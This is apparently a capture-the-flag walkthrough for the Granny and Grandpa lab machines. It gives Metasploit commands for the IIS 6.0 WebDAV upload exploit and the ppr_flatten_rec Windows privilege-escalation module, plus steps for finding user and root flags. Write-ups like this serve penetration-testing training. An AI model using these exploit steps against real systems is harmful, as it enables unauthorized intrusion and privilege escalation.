Granny and Grandpa
These two machines can be solved with same procedures (Insanely Similar) and i would brief you about Granny.This is a windows machine and it’s level is Easy. It’s IP is 10.10.10.15.
- Start with the port scan,identify its Server version and enumerate lot on it (it’s the gateway)
- once you get session, use suggester in msfconsole.
Let’s start with the usual port scan
It’s obvious that it is running an web-app but under construction. On searching about the server banner ( microsoft IIS 6.0) it has an exploit in the metasploit itself. Microsoft IIS WebDAV Write Access Code Execution. So open MSF console:
msf exploit(windows/iis/iis_webdav_upload_asp) >set rhost 10.10.10.15
msf exploit(windows/iis/iis_webdav_upload_asp) >run
After that shell will be opened but with very limited access.
Always remember when you have a meterpreter session and you need to escalate the access then run the post/multi/recon/local_exploit_suggester which would give you list of exploits which can be used in this session.
At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.
msf exploit(windows/local/ppr_flatten_rec) >set session 1
msf exploit(windows/local/ppr_flatten_rec) >set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost “YOUR_IP”
msf exploit(windows/local/ppr_flatten_rec) > exploit
BOOM!!! Meterpreter Session with escalated privileges is done ..if not try to migrate the process which is on the first session. Then try to find the user.txt and root.txt. go to Documents and Settings folder you will find the user Lakis(User is harry in Grandpa) and Administrator on which user.txt and root.txt are present..